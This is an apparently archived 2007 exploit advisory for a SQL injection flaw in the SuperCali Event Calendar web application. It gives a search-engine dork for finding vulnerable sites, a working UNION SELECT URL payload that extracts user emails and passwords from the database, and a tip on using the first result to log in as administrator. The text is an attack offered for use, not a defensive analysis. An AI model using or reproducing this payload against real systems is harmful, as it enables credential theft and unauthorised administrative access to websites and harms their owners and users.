supercali-sql.txt

2007-07-07T00:00:00
ID PACKETSTORM:57487
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-07T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ SuperCali Event Calendar SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: http://supercali.inforest.com/  
DORK: allintext:"SuperCali Event Calendar"  
  
  
DESCRIPTION:   
Pull out members info from the database.  
  
  
EXPLOITS:  
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*  
  
NOTE/TIP:   
normally the first result is admin info, click the upper right link labeled 'manage calender'  
to login as admin  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !  
  
  
--==+================================================================================+==--  
--==+ SuperCali Event Calendar SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
`